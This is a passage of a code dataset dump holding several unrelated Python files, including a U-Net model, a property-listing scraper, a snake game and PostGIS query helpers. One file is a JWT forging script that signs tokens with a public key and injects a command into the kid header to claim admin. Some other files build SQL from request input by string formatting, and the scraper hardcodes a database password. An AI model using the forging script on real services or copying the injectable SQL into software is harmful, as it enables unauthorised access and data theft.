uselist=False)\n","sub_path":"nucleus/models/directories.py","file_name":"directories.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"238598283","text":"import keras\r\nfrom keras.models import Sequential,Model, Input\r\nfrom keras.layers import Dense, Conv2D, MaxPool2D, Dropout, UpSampling2D, concatenate, Input\r\nfrom keras.optimizers import Adam, SGD\r\nimport tensorflow as tf\r\n\r\n\r\ndef unet(input_size, pretrained_weights=None,):\r\n\r\n input_shape = input_size\r\n inputs= Input(input_shape)\r\n conv1 = Conv2D(64, kernel_size=(7,7), activation='relu', kernel_initializer='he_normal',padding='same', data_format='channels_last',input_shape=input_shape) (inputs)\r\n pool1 =MaxPool2D(pool_size=(2,2), strides=(2,2), padding='same', data_format='channels_last')(conv1)\r\n conv2 = Conv2D(128, kernel_size=(7,7), activation='relu', padding='same', kernel_initializer='he_normal')(pool1)\r\n pool2 = MaxPool2D(pool_size=(2,2), strides=(2,2), padding='same')(conv2)\r\n conv3 = Conv2D(256, kernel_size=(7,7), activation='relu', padding='same', kernel_initializer='he_normal')(pool2)\r\n pool3 = MaxPool2D(pool_size=(2,2), strides=(2,2), padding='same' )(conv3)\r\n conv4 = Conv2D(512,kernel_size=(7,7),activation='relu', padding='same', kernel_initializer='he_normal' )(pool3)\r\n drop4 = Dropout(0.5)(conv4)\r\n up5=UpSampling2D(size=(2,2))(drop4)\r\n conv5 = Conv2D(256, kernel_size=(7,7), activation='relu', padding='same', kernel_initializer='he_normal')(up5)\r\n merge5 = concatenate([conv5, conv3], axis=-1)\r\n conv6 = Conv2D(256, kernel_size=(7,7), activation='relu', padding='same', kernel_initializer='he_normal')(merge5)\r\n up7 = UpSampling2D(size=(2,2))(conv6)\r\n conv7=Conv2D(128, kernel_size=(7,7), activation='relu',padding='same', kernel_initializer='he_normal')(up7)\r\n merge7= concatenate([conv7, conv2])\r\n conv8= Conv2D(128, kernel_size=(7,7), kernel_initializer='he_normal', padding='same', activation='relu')(merge7)\r\n up9= UpSampling2D(size=(2,2))(conv8)\r\n conv9 =Conv2D(64, kernel_size=(7,7), kernel_initializer='he_normal', padding='same',activation='relu')(up9)\r\n merge9 = concatenate([conv9, conv1])\r\n conv10 = Conv2D(64, kernel_size=(7,7), kernel_initializer='he_normal', padding='same',activation='relu')(merge9)\r\n conv11 = Conv2D(3, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv10)\r\n conv12 = Conv2D(1, 1, activation='sigmoid')(conv11)\r\n model = Model(inputs = inputs, outputs = conv12)\r\n if pretrained_weights is not None:\r\n model.load_weights(pretrained_weights)\r\n optimizer = SGD(lr=0.002, decay=1e-6, momentum=0.9, nesterov=True)\r\n model.compile(optimizer = optimizer, loss = 'binary_crossentropy', metrics=[tf.keras.metrics.MeanIoU(name='meanIoU',num_classes=2)], run_eagerly=False)\r\n return model\r\n\r\n","sub_path":"UNetModel.py","file_name":"UNetModel.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"184986180","text":"import requests\nimport re\nimport psycopg2\n\n\ndef pgsql_insert(lstapart):\n conn = psycopg2.connect(dbname='test', user='postgres',\n password='110167', host='localhost')\n cursor = conn.cursor()\n cursor.execute('INSERT INTO mr_d1 ( apart, price, price_m, date, hull, floor, size, finish) VALUES (%s, %s, %s, CURRENT_DATE,%s, %s, %s, %s)',\n (lstapart[0], lstapart[1], lstapart[2], lstapart[3], lstapart[4], lstapart[5], lstapart[6],))\n conn.commit()\n cursor.close()\n conn.close()\n\n\ndef pages(site):\n r = requests.get(site)\n r_e = r.content\n r_e = bytes.decode(r_e, encoding='utf-8', errors='ignore')\n pages = re.findall(r'Pagination.*End of Pagination', r_e, flags=re.DOTALL)\n pages2 = ''.join(pages)\n pages3 = re.findall(r'data-val=\"([0-9]+)', pages2)\n pages4 = [int(item) for item in pages3]\n max1 = max(pages4)\n all_apart = max1*15\n print(all_apart)\n\n conn = psycopg2.connect(dbname='test', user='postgres',\n password='110167', host='localhost')\n cursor = conn.cursor()\n cursor.execute(\n 'INSERT INTO count_apart ( desc_apart, developer, date, all_apart) VALUES (%s, %s, CURRENT_DATE, %s )', ('d1', 'mr', all_apart,))\n conn.commit()\n cursor.close()\n conn.close()\n\n\ndef parse(site):\n r = requests.get(site)\n r_e = r.content\n r_e = bytes.decode(r_e, encoding='utf-8', errors='ignore')\n\n result = re.findall(\n r'a href=\"/catalog/apartments/dmi.*catalog-item__col _favorite-wrap', r_e, flags=re.DOTALL)\n print(type(result))\n # print(result)\n result2 = ''.join(result)\n resultsplit = re.split(r'', result2)\n\n for oneapart in resultsplit:\n apart_n = re.findall(r'alt=\"(Квартира.+)\"', oneapart)\n apart_data = re.findall(\n r'
(.+)
', oneapart)\n apart_price = re.findall(\n r'
(.+) q
', oneapart)\n apart_price_m = re.findall(\n r'
(.+) q/м²
', oneapart)\n apart_price = ''.join(apart_price).replace(' ', ' ')\n apart_price_m = ''.join(apart_price_m).replace(' ', ' ')\n apart_n = ''.join(apart_n)\n\n lstapart = []\n lstapart.append(apart_n)\n lstapart.append(apart_price)\n lstapart.append(apart_price_m)\n lstapart.append(''.join(apart_data[0]))\n lstapart.append(''.join(apart_data[1]))\n lstapart.append(''.join(apart_data[2]))\n lstapart.append(''.join(apart_data[3]))\n print(lstapart)\n pgsql_insert(lstapart)\n\n\n# считаем сколько страниц\nall_apart = pages(\n 'https://www.mr-group.ru/catalog/apartments/?project=19&type=12&min_price=&max_price=')\n\n\n# студии павелецкая\nparse('https://www.mr-group.ru/catalog/apartments/?project=19&view_mode=list&scheme_building=&building=all&rooms%5B%5D=%D0%A1%D1%82%D1%83%D0%B4%D0%B8%D1%8F&min_area=&max_area=&min_price=&max_price=&floor=all&renovation=all&sort=PRICE_ASC&page=1')\n# 1 комнатные\nparse('https://www.mr-group.ru/catalog/apartments/?project=19&view_mode=list&scheme_building=&building=all&rooms%5B%5D=1&min_area=&max_area=&min_price=&max_price=&floor=all&renovation=all&sort=PRICE_ASC&page=1')\n# 2 комнатные\nparse('https://www.mr-group.ru/catalog/apartments/?project=19&view_mode=list&scheme_building=&building=all&rooms%5B%5D=2&min_area=&max_area=&min_price=&max_price=&floor=all&renovation=all&sort=PRICE_ASC&page=1')\n# # 3 комнатные\nparse('https://www.mr-group.ru/catalog/apartments/?project=19&view_mode=list&scheme_building=&building=all&rooms%5B%5D=3&min_area=&max_area=&min_price=&max_price=&floor=all&renovation=all&sort=PRICE_ASC&page=1')\n","sub_path":"python/parse/mr_d1.py","file_name":"mr_d1.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"439557773","text":"from src.window import new_window\nfrom src.color import Color\nfrom src.key import Key\nfrom src.menu import Menu, MENU\nfrom src.menu import Options\nfrom src.snake import Snake\nfrom src.game import Game\nfrom src.message import Message\n\nimport curses\n\nBLACK = curses.COLOR_BLACK\nWHITE = curses.COLOR_WHITE\nRED = curses.COLOR_RED\nYELLOW = curses.COLOR_YELLOW\nCYAN = curses.COLOR_CYAN\n\n\ndef main():\n window = new_window()\n menu = Menu()\n options = Options()\n snake = Snake()\n game = Game()\n message = Message()\n\n while 'exit' != menu.selection:\n window.resize([menu, options, game, message])\n if 'play' == menu.selection:\n snake.load()\n game.window = window\n game.snake = snake\n game.loop()\n message.window = window\n message.display(menu, snake)\n snake.reset()\n del menu.selection\n elif 'options' == menu.selection:\n snake.load()\n options.window = window\n options.game = game\n options.snake = snake\n options.loop()\n snake.save()\n del options.selection\n del menu.selection\n elif 'scores' == menu.selection:\n del menu.selection\n elif 'help' == menu.selection:\n message.window = window\n message.display(menu)\n del menu.selection\n else:\n menu.window = window\n menu.game = game\n menu.loop()\n\n curses.endwin()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"630491840","text":"\"\"\"\n1594. Maximum Non Negative Product in a Matrix\n\n\nYou are given a rows x cols matrix grid. Initially, you are located at the top-left corner (0, 0), and in each step, you can only move right or down in the matrix.\n\nAmong all possible paths starting from the top-left corner (0, 0) and ending in the bottom-right corner (rows - 1, cols - 1), find the path with the maximum non-negative product. \nThe product of a path is the product of all integers in the grid cells visited along the path.\n\nReturn the maximum non-negative product modulo 109 + 7. If the maximum product is negative return -1.\n\nNotice that the modulo is performed after getting the maximum product.\n\n \n\nExample 1:\n\nInput: grid = [[-1,-2,-3],\n [-2,-3,-3],\n [-3,-3,-2]]\nOutput: -1\nExplanation: It's not possible to get non-negative product in the path from (0, 0) to (2, 2), so return -1.\nExample 2:\n\nInput: grid = [[1,-2,1],\n [1,-2,1],\n [3,-4,1]]\nOutput: 8\nExplanation: Maximum non-negative product is in bold (1 * 1 * -2 * -4 * 1 = 8).\nExample 3:\n\nInput: grid = [[1, 3],\n [0,-4]]\nOutput: 0\nExplanation: Maximum non-negative product is in bold (1 * 0 * -4 = 0).\nExample 4:\n\nInput: grid = [[ 1, 4,4,0],\n [-2, 0,0,1],\n [ 1,-1,1,1]]\nOutput: 2\nExplanation: Maximum non-negative product is in bold (1 * -2 * 1 * -1 * 1 * 1 = 2).\n \n\nConstraints:\n\n1 <= rows, cols <= 15\n-4 <= grid[i][j] <= 4\n\n\n\"\"\"\n\n\nclass MaximumNotNegetiveProduct:\n\n def doit_dp(self, grid: list) -> int:\n\n m, n = len(grid), len(grid[0])\n\n dpmax = [[float('-inf') for _ in range(n)] for _ in range(m)]\n dpmin = [[float('inf') for _ in range(n)] for _ in range(m)]\n\n dpmax[0][0], dpmin[0][0] = grid[0][0], grid[0][0]\n direct = (-1, 0, -1);\n\n for i in range(m):\n\n for j in range(n):\n\n for k in range(2):\n\n x, y = i + direct[k], j + direct[k+1]\n\n if x < 0 or y < 0: continue\n\n dpmax[i][j] = max(dpmax[i][j], dpmax[x][y] * grid[i][j], dpmin[x][y] * grid[i][j])\n dpmin[i][j] = min(dpmin[i][j], dpmax[x][y] * grid[i][j], dpmin[x][y] * grid[i][j])\n\n maxv = max(dpmax[m-1][n-1], dpmin[m-1][n-1])\n \n return -1 if maxv < 0 else (maxv % (10**9 + 7))","sub_path":"PythonLeetcode/leetcodeM/1594_MaximumNonNegativeProductInMatrix.py","file_name":"1594_MaximumNonNegativeProductInMatrix.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"110765247","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/6/1 下午7:09\n# @Author : czw@rich-f.com\n# @Site : www.rich-f.com\n# @File : datatables.py\n# @Software: 数据交换管理平台\n# @Function: dbsrc定制表格附加模块\n\n\nclass DataTables:\n\n \"\"\"Class defining a DataTables object.\n 2018/11/1 update_by cj:由于过去的数据组装采用的是每次都读一遍所有的数据,这样会导致效率很慢,\n 由于时间紧且测试样本单一的缘故,这里暂时仅对mysql数据库的读取进行优化。\n\n :param request: request containing the GET values, specified by the\n datatable for filtering, sorting and paging\n :type request: pyramid.request\n :param query: the query wanted to be seen in the the table\n :type query: sqlalchemy.orm.query.Query\n :param columns: columns specification for the datatables\n :type columns: list\n\n :returns: a DataTables object\n \"\"\"\n #初始化\n def __init__(self, request, db_type, table = None,\n sql = None, sqlable = False,\n allow_regex_searches=False):\n \"\"\"Initialize object and run the query.\"\"\"\n # print(request)\n self.params = dict(request)\n if 'sEcho' in self.params:\n raise ValueError(\n 'Legace datatables not supported, upgrade to >=1.10')\n self.table = table\n self.results = None\n self.sql = sql\n self.sqlable = sqlable\n self.allow_regex_searches = allow_regex_searches\n self.dt = db_type\n\n # total in the table after filtering\n self.cardinality_filtered = 0\n\n # total in the table unfiltered\n self.cardinality = 0\n\n self.filter_cn = []\n self.error = None\n if db_type == 'mysql':\n self.db = __import__('richdataxmysql')\n self.c = __import__('richdataxmysql.dbstructure.cloumns',fromlist = ('cloumns'))\n elif db_type == 'sqlserver':\n self.db = __import__('richdataxsqlserver')\n self.c = __import__('richdataxsqlserver.dbstructure.cloumns',fromlist=('cloumns'))\n elif db_type == 'oracle':\n self.db = __import__('richdataxoracle')\n self.c = __import__('richdataxoracle.dbstructure.cloumns',fromlist=('cloumns'))\n try:\n self.run()\n except Exception as exc:\n self.error = str(exc)\n #组装输出\n def output_result(self):\n \"\"\"Output results in the format needed by DataTables.\"\"\"\n\n output = {}\n output['draw'] = str(int(self.params['draw'] if 'draw' in self.params else 0))\n output['recordsTotal'] = str(self.cardinality)\n output['recordsFiltered'] = str(self.cardinality_filtered)\n if self.error:\n output['error'] = self.error\n return output\n\n output['data'] = self.results\n\n return output\n\n def run(self):\n \"\"\"Launch filtering, sorting and paging to output results.\"\"\"\n if self.sqlable == False:\n if self.dt == 'mysql': # mysql优化\n rows = self.db.query('SELECT * FROM %s LIMIT %s OFFSET %s' %(self.table,self.params.get('length'), self.params.get('start')))\n else:\n rows = self.db.select(self.table).execute()\n else:\n print(self.sql)\n rows = self.db.query(self.sql)\n # print(rows)\n\n # 计数\n if self.sqlable == False:\n if self.dt == 'mysql': # mysql优化\n self.cardinality = self.db.query('SELECT count(1) From %s' %(self.table))[0][0]\n else:\n self.cardinality = len(rows)\n else:\n self.cardinality = len(rows)\n\n # 搜索(暂时没做多关键字搜索)\n try:\n if self.params['search[value]']:\n self.get_columns_name()\n # print(self.filter_cn)\n self.where = ''\n for i in self.filter_cn:\n # print(i)\n if i != 'id':\n self.where += '`'+i + \"` like binary '%\" + self.params['search[value]'] + \"%' or \"\n self.where = self.where[:-3]\n # print('SELECT * FROM %s WHERE %s' %(self.table,self.where))\n rows = self.db.query('SELECT * FROM %s WHERE %s' %(self.table,self.where))\n except:\n pass\n\n # 搜索后计数\n if self.params['search[value]']:\n self.cardinality_filtered = len(rows)\n else:\n self.cardinality_filtered = self.cardinality\n\n # # 排序\n # query = query.order_by(\n # *[e for e in self.sort_expressions if e is not None])\n\n # # 分页用\n length = int(self.params.get('length'))\n head = int(self.params.get('start'))\n if self.sqlable == False:\n if self.dt == 'mysql': # mysql优化\n pass\n else:\n rows = rows[head:head + length]\n else:\n rows = rows[head:head + length]\n self.results = rows\n # print(self.results)\n\n def get_columns_name(self):\n try:\n for i in self.c.Column(self.db,self.table).get_columns():\n self.filter_cn.append(i['Field'])\n except:\n for i in self.c.Column(self.db,self.table).fieldnames:\n self.filter_cn.append(i)\n # self.filter_cn = str(tuple(self.filter_cn))\n return self.filter_cn","sub_path":"richdataxweb/dbsrc/dbsrcTables.py","file_name":"dbsrcTables.py","file_ext":"py","file_size_in_byte":5486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"561557787","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\ngeo.py\n\nCreated by Rodolfo Barriga.\n\"\"\"\n\nimport sys\nimport decimal\nimport geo.util as util\n\nclass Point:\n\tdef __init__(self, x, y):\n\t\tself.x = x\n\t\tself.y = y\n\n\tdef wkt(self):\n\t\treturn 'POINT(%s %s)' %(self.x, self.y)\n\nclass Bbox:\n\tdef __init__(self, point_min, point_max):\n\t\tself.point_min = point_min\n\t\tself.point_max = point_max\n\n\tdef wkt(self):\n\t\ttop_left = '%s %s' %(self.point_min.x, self.point_max.y)\n\t\ttop_right = '%s %s' %(self.point_max.x, self.point_max.y)\n\t\tbottom_left = '%s %s' %(self.point_min.x, self.point_min.y)\n\t\tbottom_right = '%s %s' %(self.point_max.x, self.point_min.y)\n\t\treturn 'POLYGON((%s, %s, %s, %s, %s))' %(bottom_left, bottom_right, top_right, top_left, bottom_left)\n\t\t\nclass Metadata:\n\tdef __init__(self, name, type=''):\n\t\tself.name = name\n\t\tself.type = type\n\t\n\tdef distinct_values(self, layer_name, limit):\n\t\t\n\t\tsql = 'select distinct %s as values ' % self.name \n\t\tsql += 'from %s where %s is not null ' % (layer_name, self.name)\n\t\tsql += 'limit %s' % limit\n\t\t\n\t\tdh = util.DataHelper()\n\t\trows = dh.fetchall(sql)\n\t\t\n\t\tvalues = []\n\t\tfor row in rows:\n\t\t\tv = row['values']\n\t\t\tif isinstance(v, decimal.Decimal): v = float(v)\n\t\t\tvalues.append({'values':v})\n\n\t\tdh.close()\n\t\treturn values\n\t\t\nclass Layer:\n\tdef __init__(self, name, srid=0):\n\t\tself.name = name\n\t\tself.srid = srid\n\n\tdef metadata(self):\n\n\t\tr = self.name.split('.')\n\t\tschema = ''\n\t\tname = ''\n\t\tif (len(r)>1):\n\t\t\tschema = r[0]\n\t\t\tname = r[1]\n\n\t\tsql = 'select column_name, data_type '\n\t\tsql += 'from information_schema.columns '\n\t\tsql += 'where table_schema = \\'%s\\' ' % schema\n\t\tsql += 'and table_name = \\'%s\\' ' % name\n\t\tsql += 'and column_name != \\'%s\\' ' % 'the_geom'\n\t\tsql += 'order by ordinal_position;'\n\n\t\tdh = util.DataHelper()\n\t\trows = dh.fetchall(sql)\n\n\t\tmetadatas = []\n\t\tfor row in rows:\n\t\t\tm = Metadata(row['column_name'], row['data_type'])\n\t\t\tmetadatas.append(m)\n\t\t\t\n\t\tdh.close()\n\t\treturn metadatas\n\t\n\tdef query_count(self, criteria):\n\n\t\tsql = 'select count(*) as count '\n\t\tsql += 'from %s ' % self.name\n\n\t\tif(criteria):\n\t\t\tsql += 'where %s ' % self.__criteria_to_sql(criteria)\n\t\t\n\t\tsql += ';'\n\t\t\n\t\tdh = util.DataHelper()\n\t\trow = dh.fetchone(sql)\n\n\t\tcount = row['count']\n\t\t\n\t\tdh.close()\n\t\treturn count\n\t\n\tdef query(self, fields, criteria, paging=False, start=0, limit=0, order=False, wkt=False):\n\t\t\n\t\t#fields \n\t\tsql = 'select %s ' % fields\n\t\tif(wkt):\n\t\t\tsql += ', astext(transform(the_geom, 96)) as wkt '\n\t\n\t\t#table\n\t\tsql += 'from %s ' % self.name\n\t\n\t\t#options \n\t\tif(criteria):\n\t\t\tsql += 'where %s ' % self.__criteria_to_sql(criteria)\n\t\t\n\t\tif(order):\n\t\t\tsql += ' order by %s ' %(fields)\n\t\t\n\t\tif(paging):\n\t\t\tsql += ' offset %s limit %s ' %(start, limit)\n\t\t\n\t\tsql += ';'\n\n\t\tdh = util.DataHelper()\n\t\trows = dh.fetchall(sql)\n\n\t\tresults = []\n\t\t\n\t\t#building dynamic output dictionary from the fields\n\t\tfor row in rows:\n\t\t\tresult = {}\n\t\t\tfor f in fields.split(','):\n\t\t\t\tv = row[f]\n\t\t\t\tif isinstance(v, decimal.Decimal): v = float(v)\n\t\t\t\tresult[f] = v\n\t\t\tif('wkt' in row):\n\t\t\t\tresult['wkt'] = row['wkt']\n\t\t\t\n\t\t\tresults.append(result)\n\n\t\tdh.close()\n\t\treturn results\n\n\tdef __criteria_to_sql(self, criteria):\n\t\tsql = ''\n\t\tfor c in criteria:\n\t\t\trow_id = c['rowID']\n\t\t\tand_or = c['andOr']\n\t\t\tcolumn_name = c['columnName']\n\t\t\toperator_template = c['operatorTemplate']\n\t\t\tentry_values = c['entryValues']\n\t\t\t\n\t\t\tfor i, v in enumerate(entry_values):\n\t\t\t\toperator_template = operator_template.replace('{' + str(i) + '}', str(v))\n\t\t\t\n\t\t\tsql += and_or + ' ' + column_name + ' ' + operator_template + ' '\n\t\t\t\n\t\treturn sql\n\n\tdef bbox(self, to_srid):\n\t\t\n\t\tsql = 'select '\n\t\tsql += 'st_xmin(transform(st_setSRID(r.box, %s), %s)) as xmin, ' % (self.srid, to_srid)\n\t\tsql += 'st_ymin(transform(st_setSRID(r.box, %s), %s)) as ymin, ' % (self.srid, to_srid)\n\t\tsql += 'st_xmax(transform(st_setSRID(r.box, %s), %s)) as xmax, ' % (self.srid, to_srid)\n\t\tsql += 'st_ymax(transform(st_setSRID(r.box, %s), %s)) as ymax ' % (self.srid, to_srid)\n\t\tsql += 'from (select st_extent(the_geom) as box from %s) as r ' % (self.name)\n\n\t\tdh = util.DataHelper()\n\t\trow = dh.fetchone(sql)\n\t\t\n\t\tbbox = Bbox(Point(row['xmin'], row['ymin']), Point(row['xmax'], row['ymax']))\n\t\t\n\t\tdh.close()\n\t\treturn bbox\n\t\n\tdef static_bbox(self):\n\t\t\n\t\tsql = 'select \"left\", bottom, \"right\", top from geometry_columns '\n\t\tsql += 'where f_table_name = \\'%s\\'' % (self.name.split('.')[1])\n\n\t\tdh = util.DataHelper()\n\t\trow = dh.fetchone(sql)\n\t\t\n\t\tbbox = Bbox(Point(row['left'], row['bottom']), Point(row['right'], row['top']))\n\t\t\n\t\tdh.close()\n\t\treturn bbox\n\t\n\tdef closest_point(self, point):\n\t\t\n\t\tgeometry = 'st_geomfromtext( \\'%s\\', %s )' % (point.wkt(), self.srid)\n\n\t\tsql = 'select '\n\t\tsql += 'st_x(the_geom) as x, '\n\t\tsql += 'st_y(the_geom) as y, '\n\t\tsql += 'st_distance( %s, the_geom) as dist ' % geometry\n\t\tsql += 'from %s ' % self.name\n\t\tsql += 'order by dist '\n\t\tsql += 'limit 1'\n\n\t\tdh = util.DataHelper()\n\t\trow = dh.fetchone(sql)\n\n\t\tp = Point(row['x'], row['y'])\n\n\t\tdh.close()\n\t\treturn p\n\nclass Geometry:\n\tdef __init__(self,id,layer):\n\t\tself.id = id\n\t\tself.layer = layer\n\nclass Group:\n\tdef __init__(self, layers):\n\t\tself.layers = layers\n\t\n\tdef static_bbox(self):\n\t\t\n\t\tsql = ''\n\t\tfor layer in self.layers:\n\t\t\tif len(sql) > 0:\n\t\t\t\tsql += ' union all '\n\t\t\t\t\n\t\t\tsql += 'select \"left\", bottom, \"right\", top from geometry_columns '\n\t\t\tsql += 'where f_table_name = \\'%s\\' ' % (layer.name.split('.')[1])\n\t\n\t\tdh = util.DataHelper()\n\t\trows = dh.fetchall(sql)\n\t\t\n\t\tleft = []\n\t\tbottom = []\n\t\tright = []\n\t\ttop = []\n\n\t\tfor row in rows:\n\t\t\tleft.append(row['left'])\n\t\t\tbottom.append(row['bottom'])\n\t\t\tright.append(row['right'])\n\t\t\ttop.append(row['top'])\n\t\t\t\n\t\tbbox = Bbox(Point(min(left), min(bottom)), Point(max(right), max(top)))\n\t\t\n\t\tdh.close()\n\t\treturn bbox\n\t\t\n\tdef within_point(self,fields,point,dist):\n\t\t\n\t\tsql = ''\n\t\tfor layer in self.layers:\n\t\t\tgeom = 'st_geomfromtext( \\'%s\\', %s )' % (point.wkt(), '96')\n\t\t\ttransGeom = 'transform(%s,%s)' % (geom, layer.srid)\n\n\t\t\tif len(sql) > 0:\n\t\t\t\tsql += ' union all '\n\n\t\t\tsql += 'select character varying \\'%s\\' as layer_name, ' % layer.name\n\t\t\tsql += 'st_distance( %s, the_geom) as dist, ' % transGeom\n\t\t\tsql += 'gid, '\n\t\t\tsql += '%s ' % fields\n\t\t\tsql += 'from %s where ' % layer.name\n\t\t\tsql += 'st_dwithin(the_geom, %s, %s) ' % (transGeom, dist)\n\n\t\tdh = util.DataHelper()\n\t\trows = dh.fetchall(sql)\n\t\t\t\t\n\t\tgeoms = []\n\t\tfor row in rows:\n\t\t\tg = Geometry(row['gid'], Layer(row['layer_name'], 0))\n\t\t\tgeoms.append(g)\n\t\t\n\t\tdh.close()\n\t\treturn geoms\n\n\tdef within_bbox(self, bbox):\n\t\t\n\t\tsql = ''\n\t\tfor layer in self.layers:\n\t\t\tgeom = 'st_geomfromtext( \\'%s\\', %s )' % (bbox.wkt(), '96')\n\t\t\ttransGeom = 'transform(%s,%s)' % (geom, layer.srid)\n\t\n\t\t\tif len(sql) > 0:\n\t\t\t\tsql += ' union all '\n\t\t\t\n\t\t\tsql += '(select character varying \\'%s\\' as layer_name ' % layer.name\n\t\t\tsql += 'from %s where ' % layer.name\n\t\t\tsql += 'st_dwithin(the_geom, %s, %s) ' % (transGeom, 0)\n\t\t\tsql += 'limit 1 )'\n\n\t\tdh = util.DataHelper()\n\t\trows = dh.fetchall(sql)\n\t\t\n\t\tlayers = []\n\t\tfor row in rows:\n\t\t\tl = Layer(row['layer_name'], 0)\n\t\t\tlayers.append(l)\n\t\t\n\t\tdh.close()\n\t\treturn layers\n\n\t#TODO\n\tdef closest_point(self, point):\n\t\t\n\t\tpoints = []\n\t\tfor layer in self.layers:\n\t\t\tp = layer.closest_point(point)\n\t\t\tpoints.append(p)\n\t\t#TODO min by distance\n\t\treturn points","sub_path":"src/server/lib/geo/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"486823339","text":"import hmac\nimport hashlib\nimport base64\nimport binascii\n\ndef padding(part):\n if len(part) % 4 != 0:\n padding = 4- (len(part) % 4)\n return part + (\"=\"*padding)\n return part\n\ndef sign(part, key):\n return base64.urlsafe_b64encode(hmac.new(key.encode(), part.encode(), hashlib.sha256).digest()).decode(\"utf-8\").rstrip(\"=\")\n\ndef createJWT(kid, header, body):\n\theader = header.replace(\"0001\", str(kid))\n\tbody = body.replace(\"null\", \"\\\"admin\\\"\")\n\tpayload = base64.urlsafe_b64encode(header.encode()).decode(\"utf-8\").rstrip(\"=\") + \".\" + base64.urlsafe_b64encode(body.encode()).decode(\"utf-8\").rstrip(\"=\")\n\tsignature = sign(payload, key)\n\tprint(header)\n\tprint(body)\n\tprint(payload)\n\tprint(signature)\n\treturn base64.urlsafe_b64encode(header.encode()).decode(\"utf-8\").rstrip(\"=\") + \".\" + base64.urlsafe_b64encode(body.encode()).decode(\"utf-8\").rstrip(\"=\") + \".\" + signature\n\ndef decode(jwt):\n\tparticles = jwt.split(\".\")\n\theader = base64.b64decode(padding(particles[0])).decode(\"utf-8\")\n\tbody = base64.b64decode(padding(particles[1])).decode(\"utf-8\")\n\treturn header +\".\" + body\n\npublic_key = open('bootstrap.css')\nkey = public_key.read()\norig_jwt = \"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6IjAwMDEifQ.eyJ1c2VyIjpudWxsfQ.spzCikhspCdf6XAUci3R4EpJOH6gvZcvkDCVrkGbx7Y\"\nparticles = orig_jwt.split(\".\")\nheader = base64.b64decode(padding(particles[0])).decode(\"utf-8\")\nbody = base64.b64decode(padding(particles[1])).decode(\"utf-8\")\n\nresult = createJWT(\"\\|command goes here\", header, body)\nprint(\"---------\")\nprint(result)\nprint(decode(result))\nprint(\"---------\")\n\n\n#for i in range(1,10):\n#\tkid = \"%04d\" % i\n#\tpayload = base64.urlsafe_b64encode(header.encode()).decode(\"utf-8\").rstrip(\"=\") + \".\" + base64.urlsafe_b64encode(body.encode()).decode(\"utf-8\").rstrip(\"=\")\n#\tresult = createJWT(kid, header, body)\n#\tprint(\"---------\")\n#\tprint(result)\n#\tprint(decode(result))\n#\tprint(\"---------\")\n\n\n\n\n#header = base64.urlsafe_b64encode(header.encode()).decode(\"utf-8\").rstrip(\"=\")\n#body = base64.urlsafe_b64encode(body.encode()).decode(\"utf-8\").rstrip(\"=\")\n\n#payload = header + \".\" + body\n#print(payload)\n\n#signature = sign(payload, key)\n#print(payload + \".\" + signature)\n","sub_path":"jwt4-ruby-vulnerability.py","file_name":"jwt4-ruby-vulnerability.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"160942722","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\nTime: 2021-10-18 11:56 上午\n\nAuthor: huayang\n\nSubject:\n\n\"\"\"\nimport os\nfrom argparse import Namespace\nfrom typing import *\nfrom typing import Iterable, Union, Dict\n\nimport torch\nimport torch.nn as nn\nfrom torch import optim as optim, Tensor # noqa\n\nfrom huaytools.python import get_time_string\nfrom huaytools.pytorch.utils import default_device\n\ntry:\n accelerate_available = True\n from accelerate import Accelerator\nexcept: # noqa\n accelerate_available = False\n Accelerator = Any\n\n\nArgsType = Union[Dict, Namespace]\nLossTensor = torch.Tensor\n\n__all__ = [\n 'get_parameters_for_weight_decay',\n 'get_model_save_dir',\n 'default_device',\n 'ArgsType',\n 'LossTensor'\n]\n\n\ndef get_parameters_for_weight_decay(model: nn.Module, learning_rate, weight_decay, no_decay_params: Iterable[str]):\n \"\"\"\"\"\"\n named_parameters = list(model.named_parameters())\n # apply weight_decay\n parameters = [\n {\n 'params': [p for n, p in named_parameters if not any(nd in n for nd in no_decay_params)],\n 'weight_decay': weight_decay,\n 'lr': learning_rate\n },\n {\n 'params': [p for n, p in named_parameters if any(nd in n for nd in no_decay_params)],\n 'weight_decay': 0.0,\n 'lr': learning_rate\n }\n ]\n\n return parameters\n\n\nDEFAULT_SAVE_DIR = os.path.join(os.environ['HOME'], 'out/models')\n\n\ndef get_model_save_dir():\n return os.path.join(DEFAULT_SAVE_DIR, f'model-{get_time_string(fmt=\"%Y%m%d%H%M%S\")}')\n\n","sub_path":"src/huaytools/pytorch/train/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"219262463","text":"import logging\nimport asyncio\nimport sys\nimport discord\nfrom pytz import timezone\nimport urllib\nimport time\n\nfrom greenbot.apiwrappers.movienight_api import MovieNightAPI\nfrom greenbot.models.action import ActionParser\nfrom greenbot.models.user import User\nfrom greenbot.models.message import Message\nfrom greenbot.models.module import ModuleManager\nfrom greenbot.models.banphrase import BanphraseManager\nfrom greenbot.managers.sock import SocketManager\nfrom 